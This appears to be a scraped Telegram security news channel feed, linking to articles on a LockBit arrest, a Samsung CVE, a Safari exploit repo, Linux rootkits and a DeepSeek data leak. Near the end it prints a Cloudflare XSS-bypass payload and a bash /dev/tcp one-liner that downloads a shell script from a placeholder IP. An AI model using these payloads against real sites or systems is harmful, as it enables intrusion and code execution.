Dual ๐ท๐บ Russian-Israeli ๐ฎ๐ฑ national Rostislav Panev was arrested last August and is facing extradition to the US for playing a critical role in LockBit's RaaS activities, dating back to the ransomware gang's origins.
https://www.darkreading.com/cyberattacks-data-breaches/lockbit-ransomware-developer-arrested-israel.
Please open Telegram to view this post
VIEW IN TELEGRAM
Darkreading
LockBit Ransomware Developer Arrested in Israel
Dual Russian-Israeli national Rostislav Panev was arrested last August and is facing extradition to the US for playing a critical role in LockBit's RaaS activities, dating back to the ransomware gang's origins.
๐3๐ฅ1
https://github.com/h4x0r/parse_sms.db/tree/main
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - h4x0r/parse_sms.db
Contribute to h4x0r/parse_sms.db development by creating an account on GitHub.
https://ckure.esy.es/rx/tools/exif/
Other Web Utilities: ckure.esy.es/rx
Please open Telegram to view this post
VIEW IN TELEGRAM
๐คฃ1
https://www.404media.co/researcher-turns-insecure-license-plate-cameras-into-open-source-surveillance-tool
https://youtu.be/0dUnY1641WM
Please open Telegram to view this post
VIEW IN TELEGRAM
404 Media
Researcher Turns Insecure License Plate Cameras Into Open Source Surveillance Tool
Privacy advocate draws attention to the fact that hundreds of police surveillance cameras are streaming directly to the open internet.
๐ฅ2๐คฎ1
cKure Red
https://ckure.esy.es/rx/tools/jwt/
To generate tokens, use: https://ckure.esy.es/rx/tools/jwt/gen.php
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ2
CVE-2024-49415: Security flaw impacting Monkey's Audio (APE) decoder on Samsung smartphones that could lead to code execution.Out-of-bounds write in libsaped.so prior to SMR Dec-2024 Release 1 allows remote attackers to execute arbitrary code.
https://security.samsungmobile.com/securityUpdate.smsb
The function saped_rec in libsaped.so writes to a dmabuf allocated by the C2 media service, which always appears to have size 0x120000.
https://project-zero.issues.chromium.org/issues/368695689
https://thehackernews.com/2025/01/google-project-zero-researcher-uncovers.html
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ2๐2
https://github.com/utkusen/baitroute
https://utkusen.substack.com/p/how-to-create-vulnerable-looking
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - utkusen/baitroute: A web honeypot library to create vulnerable-looking endpoints to detect and mislead attackers
A web honeypot library to create vulnerable-looking endpoints to detect and mislead attackers - utkusen/baitroute
๐ฅ3
This media is not supported in your browser
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ2๐1๐ค1๐คฃ1
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
The Patch Report for January 2025
#ThePatchReport #ZeroDayInitiative #0day
Welcome to the January 2025 edition of the Patch Report - our brief look into the latest security updates from Microsoft, Adobe, and beyond. It's a small release from Adobe, but it's the largest patch Tuesday in Microsoft'sโฆ
Welcome to the January 2025 edition of the Patch Report - our brief look into the latest security updates from Microsoft, Adobe, and beyond. It's a small release from Adobe, but it's the largest patch Tuesday in Microsoft'sโฆ
https://www.wiz.io/blog/wiz-research-uncovers-exposed-deepseek-database-leak
Please open Telegram to view this post
VIEW IN TELEGRAM
wiz.io
Wiz Research Uncovers Exposed DeepSeek Database Leaking Sensitive Information, Including Chat History | Wiz Blog
A publicly accessible database belonging to DeepSeek allowed full control over database operations, including the ability to access internal data. The exposure includes over a million lines of log streams with highly sensitive information.
๐ฅ2๐ฅฑ1
This media is not supported in your browser
VIEW IN TELEGRAM
The CCTV footage and other documents were also exfilterated during the Cyber-Attack.
Victim organisation: Tosaf, Israel
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ7๐1๐1
Alleged Cloudflare XSS protection bypass: โ๏ธ
"><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))>๐ | 0x0SojalSec
๐ค2
Researcher: M-ShameemPlease open Telegram to view this post
VIEW IN TELEGRAM
https://github.com/wh1te4ever/WebKit-Bug-256172
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - wh1te4ever/WebKit-Bug-256172: Safari 1day RCE Exploit
Safari 1day RCE Exploit. Contribute to wh1te4ever/WebKit-Bug-256172 development by creating an account on GitHub.
๐ฅ1
https://blog.quarkslab.com/first-analysis-of-apples-usb-restricted-mode-bypass-cve-2025-24200.html
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ1
Please open Telegram to view this post
VIEW IN TELEGRAM
inferi.club
The Art of Linux Kernel Rootkits
An advanced and deep introduction about Linux kernel mode rookits, how to detect, what are hooks and how it works.
๐2
Exploiting Statistical Weaknesses in Human Interaction Anti-Evasions.
https://research.checkpoint.com/2025/the-cat-and-mouse-game-exploiting-statistical-weaknesses-in-human-interaction-anti-evasions/
Please open Telegram to view this post
VIEW IN TELEGRAM
Check Point Research
The Cat and Mouse Game: Exploiting Statistical Weaknesses in Human Interaction Anti-Evasions - Check Point Research
Executive Summary Why We Care about Sandbox Emulation As a discipline, information security involves a vast web of entry vectors, mitigations, and counter-mitigations. Among these, one of the most impactful points of conflict between attackers and defendersโฆ
bash-c "exec 3<>/dev/tcp/IP/80; echo -e GET/ youfile.sh HTTP/1.1\r\nHost; ip\r\nConnection: close\r\n\r\n' >&3; cat <&3-> yourfile.sh'Source: Linkedin | Harvey Spec
Please open Telegram to view this post
VIEW IN TELEGRAM
๐5